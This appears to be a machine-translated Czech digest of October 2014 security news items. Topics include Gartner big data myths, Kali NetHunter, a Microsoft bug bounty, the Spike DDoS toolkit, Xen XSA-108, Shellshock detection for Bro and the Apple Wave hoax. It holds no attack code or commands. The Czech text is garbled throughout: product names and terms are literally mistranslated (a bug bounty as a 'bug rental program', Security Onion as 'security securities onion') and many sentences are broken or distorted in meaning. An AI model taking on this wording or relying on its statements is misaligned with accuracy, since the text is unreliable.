S tolik humbuk kolem velkých dat, je to těžké pro vedoucí IT vědět, jak využít svůj potenciál. Gartner rozptyluje pět mýtů pomoci vedoucí IT rozvíjet své strategie pro informační infrastruktury. "Big Data nabízí velké příležitosti, ale představuje ještě větší problémy. Její naprostý objem neřeší problémy související se všechny údaje," řekl Alexander Linden, ředitel výzkumu ve společnosti Gartner . "IT vůdci musí proplout humbuk a zmatek, a vycházet při svých činnostech známých faktů a obchodními aktivitami výsledky." Mýtus 1: Každý, kdo nás čeká v přijetí velkých objemů dat Zájem velkých datových technologií a služeb je nahrát vysoká, 73 procent organizací Gartner průzkumu v roce 2014 investovat nebo plánují investovat do nich. Ale většina organizací jsou stále ještě ve velmi raných fázích přijetí - pouze 13 procent z těch, které jsme dotazovaných skutečně nasazen tato řešení

Největší problémy, které organizace čelí, jsou pro určení, jak získat hodnotu z velkých objemů dat, a jak se rozhodnout, kde začít. Mnoho organizací uvíznou v pilotní fázi, protože nemají kravatu technologii obchodních procesů nebo konkrétních případů užití. Mýtus 2: Máme tolik dat, nemusíme se starat o každou maličkost dat Chyba IT vůdci věří, že obrovský objem dat, že organizace nyní spravovat je individuální kvalitu dat nedostatky zanedbatelné vzhledem k "zákona velkých čísel." Jejich názor je, že nedostatky kvality jednotlivých údajů nemají vliv na celkový výsledek, kdy je analyzována data, protože každá chyba je jen malá část hmoty dat v jejich organizaci. "Ve skutečnosti, i když každá jednotlivá vada má mnohem menší vliv na celém datovém souboru, než tomu bylo v případě, že bylo méně dat, existuje více nedostatků, než předtím, protože tam je více dat, "řekl Ted Friedman, viceprezident a analytik společnosti Gartner. "Proto, že celkový dopad nekvalitních údajů o celém datovém souboru zůstává stejná. Kromě toho, mnoho údajů, které organizace používají ve velkém kontextu dat pochází z venku, nebo je neznámé struktury a původu. To znamená, že pravděpodobnost, že problémy s kvalitou údajů je dokonce vyšší než dříve, tak kvalita dat je ve skutečnosti mnohem důležitější ve světě velkých dat ".. Mýtus číslo 3: Big Data Technology odstraní potřebu pro integraci dat obecný názor je, že velké datové techniky - konkrétně potenciál zpracovávat informace pomocí "schématu na čtení" přístup - umožní organizacím číst stejné zdroje pomocí více datových modelů. Mnoho lidí věří, že tato flexibilita umožní koncovým uživatelům zjistit, jak interpretovat jakékoliv datové aktivum na požádání. Bude také věří, poskytovat přístup k datům na míru jednotlivým uživatelům. Ve skutečnosti, většina informací uživatelům výrazně spoléhají na "schématu na zápis" scénáře, ve kterém je popsáno údaje, obsah je předepsáno, a existuje dohoda o integritu dat a jak to souvisí s scénářů. Mýtus číslo 4: Je to zbytečné Použití datového skladu pro pokročilé analytiky Mnoho informačního managementu (IM) vedoucí zvážit budování datového skladu, aby být časově náročné a zbytečné cvičení, kdy pokročilé analytiky použití nových typů dat nad rámec datového skladu. Skutečností je, že mnoho pokročilých analytických projektů používají datový sklad během analýzy. V ostatních případech, vedoucí IM musí upřesnit nové datové typy, které jsou součástí velkých dat tak, aby byly vhodné pro analýzu. Musí se rozhodnout, která data relevantní, jak to agregovat, a úroveň kvality údajů nezbytné - a to zpřesnění údajů se může stát na jiných místech než datového skladu. Mýtus 5: Údaje jezera nahradí datového skladu Prodejci na trhu Údaje jezera jako celopodnikové platformy pro správu dat pro analýzu různorodé zdroje dat v jejich nativních formátech. Ve skutečnosti, je to zavádějící pro prodejce pro umístění dat jezera jako náhrada pro datové sklady nebo jako kritické prvky analytické infrastruktury zákazníků. Foundational technologie datového jezera chybí vyzrálost a šíři rysů nalezených v zavedených datových skladů technologií. "Datové sklady již schopnosti podporovat širokou škálu uživatelů v celé organizaci. Lídři chatu nemusíte čekat na datové jezera dohnat," řekl Nick Heudecker, ředitel výzkumu ve společnosti Gartner.


Energie IT profesionálové ukazují překvapující optimismus
3.10.2014 Incidenty
Tripwire oznámila výsledky průzkumu 104 účastníků na summitu EnergySec bezpečnosti v Texasu. průmysl výzkum ukazuje, většina porušení jít neobjevený týdnů, měsíců nebo i déle. Přes tento důkaz, 66 procent respondentů věří, že by mohli odhalit porušení dat v kritických systémů v týdnu:

23 procent uvedlo, že bude trvat méně než 24 hodin
24 procent uvedlo, že bude trvat méně než 72 hodin
19 procent uvedlo, že bude trvat méně než týden.
10 procent respondentů uvedlo, detekce narušení dat bude trvat měsíc, 9 procent uvedlo, že by se za tři měsíce a 15 procent nebyli jisti, že by mohla odhalit porušení. "Výsledky průzkumu odrážejí překvapující optimismus," řekl Steven Parker, prezident EnergySec , nezisková organizace se tvořila podporovat organizace v rámci energetického sektoru při zajišťování jejich kritické technologické infrastruktury. "Detekce útoků je zásadní schopnost, a myslím, že je mnohem více práce je třeba udělat v této oblasti, než si většina organizací realizovat." Podle Mandiant 2014 M-Trends 2014: Za zprávy Porušení hrozeb zapotřebí průměrná doba na detekci porušení je 229 dnů . Ve zprávě se také uvádí, že počet firem, které zjištěn jejich vlastní porušení klesl z 37 procent v roce 2012 až 33 procent v roce 2013. "Vždycky říkám, že důvěra není kontrola, a naděje není strategie," řekl Dwayne Melancon, CTO pro Tripwire. "Bohužel, tato data naznačují, že mnoho odborníků v oblasti energetické bezpečnosti jsou příliš naděje na jejich vlastních schopností kybernetické bezpečnosti."


Symantec sjednocuje řešení Norton pod jedinou platformu

3.10.2014 Zabezpečení
Dosavadních devět bezpečnostních produktů Norton se slučují do jediné služby - Norton Security. Ta nabízí vícevrstvé zabezpečení před různými hrozbami na široké paletě platforem. Navíc vyšší verze v ceně nabízí i zálohování s kapacitou 25 GB.

Novinka je dostupná například pro osobní počítače, Macy, chytré telefony a tablety s Androidem či iOS.

Řešení zahrnuje obvyklé technologie jako například Insight, SONAR či monitorování hrozeb. Navíc technologie Safe Web, Scam Insight, Download Insight and Anti-Phishing sdílí informace mezi sebou a detekují, jestli navštívené webové stránky nejsou součástí nových útoků využívajících softwarové inženýrství.

Aktualizované uživatelské rozhraní cloudového portálu usnadňuje přidávání ochrany pro nová zařízení, zobrazení stavu ochrany a také správu předplatného služby, včetně všech potřebných detailů a náhledů.

Vylepšený Identity Safe zase usnadňuje práci s hesly. Uživatelská jména a hesla si totiž může sám zapamatovat a následně je automaticky zadává.

Mobile Insight navíc prochází více než 200 různých obchodů s aplikacemi (appstore) a zajišťuje dynamickou analýzu chování aplikací. Pomáhá tak uživatele chránit před aplikacemi, které způsobují únik osobních informací nebo obsahu a které mohou měnit nastavení zařízení, zobrazovat nechtěné reklamy v oznamovací liště nebo enormně vybíjet baterii či nadměrně využívají datové přenosy.

Díky těmto informacím mají uživatelé lepší přehled, jaké osobní údaje která aplikace shromažďuje a proč mohou růst například poplatky za datové přenosy.

Zajímavá je i on-line podpora na telefonu i po internetu bez dodatečných nákladů po dobu jednoho roku. Norton Security podporuje tým více než 500 bezpečnostních expertů po celém světě.

Novinka bude k dispozici od 10.10. 2014 jako flexibilní služba, která chrání různá zařízení. Norton Security pro jednoho uživatele – jedno zařízení – bude v prodeji za 1 099Kč vč. DPH na rok, Norton Security až pro 5 zařízení bude v prodeji za 1 649Kč vč. DPH na rok a Norton Security se zálohováním až pro 10 zařízení za 1 899Kč vč. DPH ročně.


Kali NetHunter změní Nexus zařízení do přenosných hackerských nástrojů
2.10.2014 Nástroje
Offensive Security, bezpečnostní školení společnost za Kali Linux, populární Debian-založené OS je určen pro digitální forenzní a penetrační testy, a Kali člen komunity "BinkyBear" vytvořili další skvělý nástroj pro pentesters: NetHunter . "NetHunter je Android penetrační testování platformy pro Nexus zařízení postavené na vrcholu Kali Linux, "vysvětlila společnost na oficiálních internetových stránkách nástroje. "Samozřejmě, že máte k dispozici všechny obvyklé nástroje Kali NetHunter stejně jako možnost získat plnou VNC relace z telefonu do grafického Kali chroot." Ale NetHunter OS má také další funkce, jako je předprogramovaných HID Keyboard útoky ( zapne zařízení a jeho OTG kabel USB do předem naprogramované klávesnici), BadUSB Man In The Middle útoky, jedním kliknutím MANA Evil Access Point setupy (pro provedení Wi-Fi AP a MITM útoky), a tak dále .
To je jen začátek, říkají, protože doufají, přidat nové funkce pomocí komunity. Ti, kteří chtějí vyzkoušet NetHunter můžete tak učinit ihned, protože nástroj je open source a zdarma k použití. Jediné, co musí mít, aby to fungovalo tak, jak má, je zařízení Google Nexus (5, 7 nebo 10). nástroj v současné době nefunguje dobře na non-Nexus zařízení Android, protože je navržen tak, aby využívání specifických zdrojové kódy jádra v Tým se podařilo získat od společnosti Google. "Je možné vytvořit" rootfs "NetHunter pouze fotografie, které nezahrnují naše vlastní jádro, takže je k dispozici jako HID, Wi-Fi připojení na injekci a BadUSB nebude fungovat, a obecně," Váš se může lišit "vysvětlili." Neposkytujeme podporu pro tento i když, takže jste na vlastní pěst. "


Microsoft uvádí na trh chyba nájemný program Online Services
2.10.2014 IT
Společnost Microsoft spustila další nájemný programu chyba, a ten se bude soustředit na své Online Services. Bug lovci jsou vyzvány, aby předložily zranitelnosti, které ovlivňují následující služby: Office 365, Outlook (jen jak to jde Office 365 služby pro obchodníky), Microsoft Online Services, Sharepoint , Lync, Yammer, a několik dalších. Společnost hledá XSS a CSRF chyby, vstřikovacích a ověřování chyb, server-side spuštění kódu a zvýšení úrovně oprávnění zranitelnosti, konfigurací otvorů, nejistých odkazy přímý předmět a zranitelnosti, které umožňují neoprávněný cross-nájemce manipulaci s daty nebo přístup. "Kvalifikovaní podání mají nárok na minimální platbu 500 dolarů USD," oznámila firma. "Odměny budou vyplaceny podle uvážení společnosti Microsoft na základě dopadu zranitelnosti." Jak je zvykem u tohoto typu chyb bounty programů Microsoft zakazuje chyb lovci v tom testování DOS, automatizované testování, které by mohly vést k DoS, získat přístup k účtům které nejsou jejich, (oni by měli používat testovací účty a nájemce pro jejich snímání), se snaží sociálního inženýrství a phishingové útoky na zaměstnance společnosti, a "pohybující se mimo PoC repro kroků pro otázky exekučního server-side." seznam nezpůsobilých podání má také byly poskytnuty .


Skutečnosti snižující závažnost rizika pro Spike DDoS toolkit-poháněl útoky
2.10.2014 Hrozby
Akamai Technologies vydala přes Prolexic Security Engineering & Response Team (PLXsert), nové kybernetické hrozby poradenství, které upozorní podniky k ohrožení s vysokým rizikem silného distribuované odmítnutí služby (DDoS) útoky společnosti od Spike DDoS Toolkit. Díky této výbavy, škodlivé herci budování větších DDoS botnety zaměřením širší škálu internetových schopné zařízení. multi-vektor toolkit můžete spustit založená na infrastruktuře a DDoS aplikace založené na užitečné zatížení. Útoky jsou SYN Flood, UDP Flood, Domain Name System (DNS) Dotaz povodní, a získat záplavy. Některé kampaně byly hlášeny proti hostiteli v Asii a ve Spojených státech. DDoS útok kampaně zahájené z botnetu byly cílené zákazníky Akamai. Jeden DDoS útok kampaň zmírnit společnost dosáhla vrcholu 215 gigabitů za sekundu (Gb) a 150 milionů paketů za sekundu (Mp). Spike DDoS nástrojů běží na systému Windows, ale může komunikovat a provádět příkazy pro Windows, Linux a ARM založené zařízení nakažený s binárními užitečné zatížení. Schopnost vytvářet ARM založené na binární náklad naznačuje, že autoři tohoto škodlivého nástroj se snaží ovládat zařízení jako jsou routery a internet věcí (internet věcí) zařízení (tj inteligentní termostat systémů a pračka / sušičky). Schopnost infikovat a kontrolovat širší škálu zařízení, by mohla umožnit DDoS útočníkům šíření botnetů v post-PC éry. Most DDoS infrastruktury útoky zahajované Spike DDoS Toolkit lze zmírnit zavedením seznamy řízení přístupu (ACL), že filtr se nežádoucí provoz. Pro zmírnění proti Toolkit je na aplikační vrstvě GET povodněmi útoku PLXsert produkoval podpis Snort, který je k dispozici v poradenství hrozeb. multiplatformní infekce kód v této soupravě se zvyšuje složitost hrozbu, a sofistikovanost a je nezbytné aplikovat systém tvrdnutí opatření ke každému z cílových operačních systémů a platforem. Odkazy na průmyslových doporučených kalení techniky jsou poskytovány na správce systému v poradenství. Poradní také pravidlo YARA identifikovat Bot užitečné zatížení používané infikovat zařízení a učinit je součástí botnetu. PLXsert očekává další napadení a rozšíření tohoto DDoS botnetu. poradenství (nutná registrace) také obsahuje následující informace:

Ukazatele binární infekce
Command a ovládací panel
Variace Toolkit
Inicializace Bot
DDoS užitečná zatížení
Podrobnosti pozorované útoku kampaně
Zmírnění DDoS
Systém kalení zdroje.


Školení pro CISSP a jiné (ISC) 2 certifikace
2.10.2014 Zabezpečení
(ISC) 2 je CISSP žít on-line CBK školicí seminář poskytuje stejnou oceňovanou obsah kurzu semináře ve třídě na základě a ve prospěch s (ISC) 2 autorizovaného instruktora, ze své vlastní počítače.

Formát: Každé pondělí a středu od 18:00 do 20:30 CEST (GMT + 1) v průběhu 8 týdnů, takže máte dostatek času na zorganizování komplexní studijní plán kolem živých lekcích. Neomezený přístup k sezení: Sessions jsou dodávány živě a všechny jsou archivovány, takže můžete k nim přistupovat tolikrát, kolikrát chcete, po celou dobu tréninku a 60 dnů poté, s možností e-mailu s instruktorem s otázkami. zkouška poukaz a studijní příručky: Obdržíte zkoušku poukaz platný po dobu 12 měsíců což vám ušetří námahu zaplatit zvlášť. Součástí jsou třídních příručky a nejaktuálnější e-verze Úředního (ISC) 2 Průvodce k CISSP ČBK.


Rozvíjející se mezinárodní výzvy ochrany osobních údajů
2.10.2014 Ochrany
Podle nového průzkumu z Cloud Security Alliance je rostoucí a silný zájem o harmonizaci právních předpisů o ochraně osobních údajů na univerzální souborem zásad. "úvahy o ochraně osobních údajů jsou často přehlíženy ve fázi vývoje cloud, internet věcí a velkých objemů dat řešení, a místo toho jsou považovány bludištěm složitých předpisů a pokynů, "řekl Jim Reavis, generální ředitel ČSA. "Tato zjištění zdůrazňují velmi významnou příležitost pro globální spolupráci mezi ředitelů zastává a profesionály INFOSEC, vedoucí ochrany osobních údajů, developery a architekty, vytvořit zásady ochrany osobních údajů v nových a rozvíjejících se řešení." Při provádění průzkumu, čtyřicet z nejvlivnějších Cloud Security vůdců na celém světě byli požádáni o postřehy na stávající mezinárodní normy a požadavky na ochranu osobních údajů, a poskytnout informace o právních předpisech a postupech jejich regionů okolních osobní údaje. Průzkum byl navržen tak, aby otestovat existenci univerzálních konceptů ochrany osobních údajů a ochrany osobních údajů a míru, do jaké tyto mohou být ovladače pro globální kooperativní úsilí kolem Cloud, internet věcí a Big Data. Zpráva byla rozdělena do čtyř částí, a výsledky byly velmi svědčí o pozitivní roli, že zásady ochrany soukromí a ochrany údajů mohou hrát v rozvoji Cloud, internet věcí a velké datové řešení. Historicky, odborníků na ochranu osobních údajů a odvětví informační bezpečnosti u velké se zaměřila na odchylky mezi různými regiony, namísto podobností, které by mohly podporují více efektivní spolupráci. V objevování oblasti vyrovnání a odchylky s ohledem na právní předpisy a zvyklosti globální ochranu osobních údajů, organizace může řídit inovace v souvislosti s novými technologiemi. Průzkum byl rozdělen do čtyř částí, se hlavních zjištění takto: data pobytu a svrchovanosti Mnohé organizace bojují s Problémy kolem dat pobytu a suverenity. Nicméně, tam byl častým námětem respondentů myslí "osobní údaje" a osobní údaje (PII) jako data, která musí zůstat s bydlištěm ve většině zemí. zákonném odposlechu Odpovědi uvedena univerzální výklad pojmu zákonného odposlechu, s odpovědí jako například:. "Právo na přístup k datům přes zákony jednotlivých zemí, pokud nastane potřeby, potřebuje tedy údaje, které mají být k dispozici pro vyšetřování počítačové trestné činnosti" Uživatel souhlas Sedmdesát tři procent respondentů uvedlo, že by měla být výzva pro globální spotřebitel účet práv a dále viděl OSN při podpoře to. To je velmi důležité vzhledem k tomu, že harmonizace probíhá v Evropě, s jediným dat EU směrnice o soukromí pro 28 členských států, jakož i obnovené výzvy k americké spotřebitele zákona o ochraně soukromí, práv ve Spojených státech, a opatření přeshraniční soukromí v Austrálii a Asii. Ochrana osobních údajů Zásady Nakonec bylo prozkoumáno, zda principy OECD soukromí, které byly velmi vlivný ve vývoji mnoha předpisy o ochraně osobních údajů také usnadnit populární trendy v oblaku, internetu věcí a velkých objemů dat iniciativy nebo způsobit prostoru pro napětí.


Společnosti se stávají laxní při řízení rizik BYOD
2.10.2014 Mobil
Expozice rizika je jako velkou hrozbu dnes stejně jako v roce 2013; Nicméně, organizace se staly méně pilný ve vedení BYOD a zmírňování, podle TEKsystems. Sedmdesát dva procent IT profesionálů věří, že citlivá data společnost je v ohrožení vzhledem k zaměstnancům přístup k informacím z osobních zařízení. Téměř dvě třetiny respondentů (64 procent ) uvádí, že buď žádný oficiální BYOD politika existuje v jejich organizacích a / nebo vůbec nic bylo sděleno o BYOD. Tím se zvýšila o 21 procent od roku 2013, kdy 43 procent identifikován stejný nedostatek pokynů a osvědčených postupů. Navzdory faktu, že mobilní zařízení poskytují profesionálům s větší flexibilitou, ale také zvyšují stres a rozšířit pracovní den.

Polovina respondentů uvedlo, že možnost přístupu k práci (například aplikace, dokumenty, e-mail), přes mobilní zařízení se zvýšil důraz, protože nejsou nikdy schopni odpojit. Pouze 28 procent pocit, že snižuje stres a 22 procent jich uvádí, že nemá žádný vliv na stres.
Téměř dvě třetiny (61 procent) všech respondentů uvádějí, že kdyby měli na výběr, oni by raději pracují ve včerejším světě, kde by byly nepřístupné mimo pracovní dobu.
Ačkoli většina respondentů by chtělo, aby bylo možné odpojit, ale uznávají, že mobilita jim dává větší kontrolu nad jejich pracovního života. Pro mnoho lidí, tam je také pocit naléhavosti asi je připojen.
Šedesát procent respondentů uvádí, mobilita jim dává větší kontrolu nad jejich pracovního života, přičemž 28 procent ukazují, že dává kontrolu zaměstnavatele více.
Čtyřicet dva procent respondentů přiznat, že i v době mimo hodin, je-li jejich smartphone ztratil schopnost připojit se k práci, které by upozornily na problém během jedné hodiny.
Když ptal se na jejich ranní vstávání, 28 procent IT profesionálů se přiznat, že první věc, kterou dělat, když se probudí, je zkontrolovat jejich mobilní zařízení, ještě před použitím koupelnu.
Ačkoliv se zdá, inteligentní zařízení získávají trakci jako oblíbeného způsobu komunikace, pokud jde o základní pracovní činnosti, notebook je stále preferovaná zařízení.
IT odborníci uvádějí, že času tráví prací na různých zařízeních během typického pracovního dne (laptop 67 procent, smartphone 25 procent, tablet 8 procent) je téměř identický s čas strávený prací na těchto zařízeních po pracovní době (laptop 61 procent, smartphone 31 procent, tablet 8 procent).
Šedesát jedna procent respondentů tvrdí, že kdyby si měl vybrat pouze jedno zařízení pro přístup k práci po pracovní době po dobu jednoho týdne, budou vybírat si notebook.
"Rostoucí deficit politiky a řízení BYOD odkryty v tomto snímku je s podivem, zejména s ohledem na zvýšené hrozby počítačové kriminality a mobilních útokům," říká Jason Hayman, TEKsystems průzkum trhu manažer. "Míra vystavení riziku je umocněna skutečností, že IT odborníci a ostatní zaměstnanci jsou vždy připojené, práce z více zařízení z téměř libovolného místa. Tato zjištění naznačují, že společnosti, které buď se úplně zahlceni procesu zahájení a dodržování kontroly BYOD, nemají pocit, že je legitimní hrozba, nebo jste udělal nebezpečný předpoklad, že jejich tech-důvtipný zaměstnanců nepotřebuje směr, pokud jde o bezpečné používat osobní zařízení. "


Praktiky rady týkající se IT dohled a kybernetické bezpečnosti
2.10.2014 Bezpečnost
Větší zapojení ředitel v sociálních médiích dohled, obavy z ministerstva pro vnitřní bezpečnost / NIST kybernetické rámců a zvýšené využívání IT konzultanti patří mezi trendy formují veřejné správy a správní rada do budoucna, podle PwC. Ředitelé také na vědomí, že velkých objemů dat a cloud technologie jsou dvě oblasti, které mohou vyžadovat více pozornosti desky. A většina ředitelů nebyly projednány plán reakce na krizové situace nebo kybernetické pojištění své společnosti. Kromě toho, ženy ředitelé obecně chtějí trávit více času na to vydává, než to mužské ředitele. V létě roku 2014, 863 veřejných ředitelé společnosti reagoval na výroční Corporate Directors průzkumu PwC 2014. Z nich 70% slouží na radách společností s více než 1 miliardu dolarů v ročních příjmů. "strukturovaná jsme letošní průzkum, aby zjistily, ředitel sentiment na klíčových trendů, jakož i další faktory, které formují veřejné správy a správní rada do budoucna," řekla Mary Ann Cloyd, vedoucí k centru PwC pro správní radě. . ". Během několika posledních let jsme viděli významné změny se nalodit na postupy týkající se IT dohledu a kybernetická bezpečnost Stále více se uznává, že je to obchodní záležitost, a to nejen otázka technologie" PwC zdůrazňuje režisér pocity týkající se těchto konkrétních trendů: Čtyřicet jedna procent ředitelů tvrdí, že jsou nyní alespoň mírně zabývá dohledu monitorování společnosti a sociální média pro nepříznivou publicitu - ve srovnání s 31% v roce 2012 došlo k nárůstu 11 procentního bodu na režiséry, kteří se alespoň trochu zabývá dohlížet na školení zaměstnanců a politiky sociální média. Podobně, téměř polovina ředitelů jsou nyní alespoň trochu zabývá dohlížet využití zaměstnanců mobilních technologií - dvakrát více než před dvěma lety. Čtyřicet dva procent ředitelů jsou alespoň trochu znepokojen dopadem nového ministerstva pro vnitřní bezpečnost / NIST kybernetické rámec, ale mnoho ředitelů ještě nemusí být vědomi protokoly nebo jejich potenciálního dopadu. Ředitelé na vědomí, že velké datové a cloud technologie jsou dvě oblasti, které by mohly použít více jejich pozornost, s více než čtvrtina říká, že nejsou dostatečně zapojeni. Pouze 53% ředitelů říkají, že strategii své společnosti a IT Risk zmírnění "alespoň mírně" si dostatečný náskok velkých dat. Téměř polovina ředitelů nebyly projednány svůj plán krizové reakce společnosti v případě narušení bezpečnosti a více než dvě -thirds nebyly projednány kybernetické pojištění své společnosti. Bylo pozoruhodné rok-přes-rok zlepšení názory ředitelů o IT strategie své firmy a IT Risk zmírnění. Čtyřicet pět procent nyní věří, přiblížení velmi přispívá jejich společnosti, aby, a je v souladu s, nastavení celkové strategie společnosti, zatímco 26% ředitelů velmi věří, že poskytuje deska s odpovídající informace účinný dohled (ve srovnání s 37% a 22% , respektive v roce 2013). větší procento (66%) se také domnívá, přístup jejich společnost je podporován dostatečným porozuměním IT na úrovni rady (ve srovnání s 64% v roce 2013). Dámské režiséři jsou více skeptičtí, zda je strategie jejich společnosti a IT Risk zmírnění je podporován dostatečným porozuměním IT na úrovni desky (pouze 13% uvádí, že "moc" ve srovnání s 22% mužů ředitelů). Dámské ředitelé jsou také skeptičtí, zda je přístup jejich společnost poskytuje desku dostatečné informace pro účinný dohled (15% uvádí, že "moc" ve srovnání s 28% mužů ředitelů). Využití externích IT poradců na pomoc desek je na vzestupu , s 38% ředitelů nyní říkají, jejich desky použít externí IT konzultanty - ve srovnání s 26% v roce 2012.


Nejlepší tipy na ochranu systémů před zneužitím důvěrných informací
2.10.2014 Incidenty
2014 Verizon dat Porušení Vyšetřování Zpráva odhalila znepokojující trend, což je skutečnost, že přístupová práva uživatelů se staly slabým místem v bezpečnostních politik pro většinu organizací. Zpráva potvrzuje tento trend tím, že řekne, že 88% bezpečnostních incidentů byly způsobeny nesprávným zasvěcených, také ukazuje, že pouze 9% z úniku dat byly objeveny díky neustálému auditu IT systémů. Problematika insider hrozeb zhoršuje s tím, že porušení může trvat od několika dnů až týdnů, aby se objevil, a v některých případech bude let projít až zjistíte, že citlivé informace byla prozrazena. Současně, podle zprávy 2014 InfoWorld Navigace IT, i když 89% IT profesionálů připustit nutnost investic do zabezpečení, pouze 44% velkých podniků a 13% malých a středních podniků ve skutečnosti plánují investovat a prosadit svou bezpečnostní politiku v blízké budoucnosti. Vzhledem k tomuto trendu, NetWrix vysvětluje, proč sledování přístupových práv na pravidelné základ a ochranné systémy proti obchodování zasvěcených zneužití je pro organizace všech velikostí. Chcete-li pomoci společnostem vyhnout se bezpečnostních incidentů a jejich ničivé důsledky, akcie NetWrix tři z nejlepších otázek, každá firma by měla být schopna odpovědět kladně na zajištění ochrany citlivých dat proti obchodování zasvěcených hrozby: Myslíte si, sledovat "činnost pravidelně? uživatelských účtů - to je důležité pro firmy, kde je počet uživatelských účtů se neustále mění, nebo pokud v důsledku vnitřních směny uživatelů oprávnění jsou pravidelně aktualizovány. Rizika se často ukrývají v aktivních účtů bývalých zaměstnanců a na účtech s redundantní oprávnění. Máte-li sledovat změny v rámci celé IT infrastruktury, budete mít kompletní přehled o tom, kdo provedl změnu, stejně jako kdy a kde byly provedeny změny; proto můžete sledovat jakýkoliv škodlivý účinek. Víte, vaše data a kdo má k němu přístup? - zrychlující se objem bezpečnostních incidentů, které byly způsobeny nesprávným použitím oprávnění ukazuje, že společnosti jsou vědomi nejen o tom, kdo má přístup k údajům, ale i tam, kde se tato data uložena, nahrané a sdílené. Sledování infrastruktury a sledování změn IT provedené citlivých dat vám pomůže minimalizovat narušení zabezpečení. Jsou vaši zaměstnanci vědomi toho, že jejich činnost je sledována? - Tento postup by měl být určitě součástí bezpečnostní politiky každé společnosti. Publikování anonymní zprávy a jejich sdílení mezi zaměstnanci vysvětluje lépe než slova, že každý je zodpovědný za bezpečnost dat, a to nutí zaměstnance, aby ovládat své jednání. "I s tím nezbytnosti chránit citlivá data, jen málo firem si uvědomuje, že je infrastruktura by měla být přijata pod kontrolou. Bohužel, mnohem méně z nich sledovat změny a kontrolovat přístupová práva uživatelů, "řekl Michael Fimin, generální ředitel a spoluzakladatel NetWrix. "Nicméně, s IT systémem audit na pravidelné umožňuje dávat pozor na všechny nebezpečné změny. S kompletní přehled v celé IT infrastruktuře usnadňuje nejen vyšetřování v případě narušení bezpečnosti dochází, ale také zaručuje, že vaše citlivá data jsou pod stálou kontrolou.


Xen Security Advisory - XSA 108 - http://xenbits.xen.org/xsa/advisory-108.html
2.10.2014 Zranitelnosti
Xen vydal poradenství a související opravu k řešení problému, který umožňuje "buggy nebo škodlivý HVM hosta zhroucení hostitele nebo číst data týkající se ostatními hosty nebo hypervisor sám."

Xen 4.1 a novější jsou zranitelné, tak systémy x86 jsou zranitelné. ARM systémy nejsou ohroženy.

Použití náplasti je tento problém vyřešen.


Bezpečnost Onion news: Bylo aktualizováno zjišťování skripty Shellshock pro Bro
2.10.2014 Hrozby
Za jeden cenný papír cibule je Doug Burks , Seth Hall vyvinula některé komplexní detekční skripty Shellshock pro Bro.
Tyto skripty "odhalit úspěšné využití zranitelnosti Bash s CVE-2014-6271 přezdíval" ShellShock "a jsou více komplexní než většina zjištěných v tom, že jsou číhající na chování z napadeného počítače, které by mohly signalizovat úspěšný kompromis, nebo skutečné chyby. " Seth byl aktualizován tyto skripty dnes znovu na "Přidat shellscripts jako post-využití mechanismu detekce." Doug aktualizovala balíček securityonion-bro-skripty, aby se tato změny a také aktualizovaný balíček securityonion-web-stránek zahrnout některé ELSA dotazy pro "Shellshock využije" a "Shellshock skenery".

To je skvělé pro běžné uživatele Security cibule, a ještě lépe pro čtenáře, kteří dosud zkoumaných a investovali do bezpečnosti cibulkou. Nyní je čas, aby se seznámili a zlepšit povědomí o situaci, zejména s ohledem na skutečnost, že je to National Cyber ​​Security Awareness měsíc . :-)

Vše, co potřebujete, je k dispozici na Dougovy blogu: http://blog.securityonion.net/2014/10/new-securityonion-bro-scripts-and.html


Dejte si pozor na Apple Wave mikrovlnné bezdrátové nabíjení podvodu
1.10.2014 Kriminalita
Nadšený z nové bezdrátové technologie nabíjení Wave iPhone a nemůže se dočkat, až to vyzkoušet? Prosím, ne - je to podvod. Může dojít k poškození i smartphonem a mikrovlnná trouba. podvod byl spuštěn Internetová trollů vyplnění neslavný 4chan fórum, kdo vytvořil věrohodnou reklamu na falešné funkci a začal šíření ho on-line v rámci hashtag #AppleWave:

Chcete-li rozšířit dosah inzerátu a zlepšit své šance na úspěch, ostatní 4chan Uživatelé byli vyzýváni, aby spam reddit, Tumblr, Twitter, Facebook a další sociální sítě s tím, a mluvit o tom, jak úžasné je tato funkce. Bohužel se zdá, že žádný ohledu na to, jak nelogické tvrzení je, počet uživatelů iPhone padli za to. Zatímco mnozí uživatelé nalézt hoax zábavu a pomohl rozšířit to, faktem zůstává, že by to mohlo být nebezpečné, a méně uživatelů tech-důvtipný by neměly být povzbuzovány k provedení falešné nabíjení proces. Popularita mobilních zařízení Apple a nedávné vydání své nejnovější verzi spolu s tím iOS 8 je těžce zneužívána prostřednictvím on-line podvodníky. Další iPhone-themed podvod, který je v současné době dělá kola na internetu je falešná zpráva že řada iPhone 6 telefonů byly kontaminovány Ebola při výrobě a pomáhají virus šířit.


Minimalizace rizik ochrany osobních údajů umístění sběru dat
1.10.2014 Sledování
S příchodem chytrých telefonů a tabletů - zařízení uživatelé často s sebou všude, kam jít - získané lokalizační údaje, se stal cenným zdrojem informací pro komerční subjekty a organizace veřejného sektoru. lokalizační údaje uživatelů jsou běžně shromažďují ve velkém měřítku prostřednictvím celulární sítě operátoři, služby založené na lokalizaci a umístění povolen sociální sítě platformy. Ale může tento druh informací prozradit příliš mnoho o našich životech - je to hrozba pro naše soukromí? skupina vědců z Národní univerzity v Singapuru a na evropské bázi SAP prozkoumali informace o pohybech (shromážděných každých 15 minut) v hodnotě nad půl milionu jedinců za období jednoho týdne, a zjistili, že "anonymity" uživatelé tím, že nahradí jejich identity s náhodným identifikátoru není dost, a že "stopy lidské mobility vysoce identifikovat jen s několika časoprostorových bodů." "Předpokládáme, že protivník může znát určitý počet časoprostorových bodů mezi stopy cílové uživatele. Změříme počet trajektorií, že protivník můžete najít na základě stávajících znalostí," vysvětlili. "Trajektorie je jedinečný a re-identifikace je úspěšný, pokud je k dispozici pouze jedna dráha." Bohužel ani v této velké datové sady (56 milionů desek), více než 60 procent z drah jsou jedinečné. Naštěstí, že číslo může být snížena na méně než 30 procent s jedním jednoduše nastavením. "Hlavní myšlenkou této metody je" snížit "dlouhé trajektorie v několika krátkých drah v závislosti na různých časových oknech. Tyto kratší dráhy jsou pak přiřazeny různé uživatele identifikátory pro každé časové okno ", které bylo uvedeno, a dodal, že úprava je jak snadno škálovatelné a nemá vliv na data nástroje. Přesto, oni se o to poukázat na to, že i když tato změna zlepší ochranu soukromí, neposkytuje úplnou anonymitu.


Velkoobjemové DDoS útoky na vzestupu
1.10.2014 Počítačový útok
Pokračující trend DDoS útoky jsou krátké trvání a často opakuje. Současně, velkoobjemové a high-rychlost DDoS útoky jsou na vzestupu v první polovině roku 2014, v souladu s NSFOCUS.

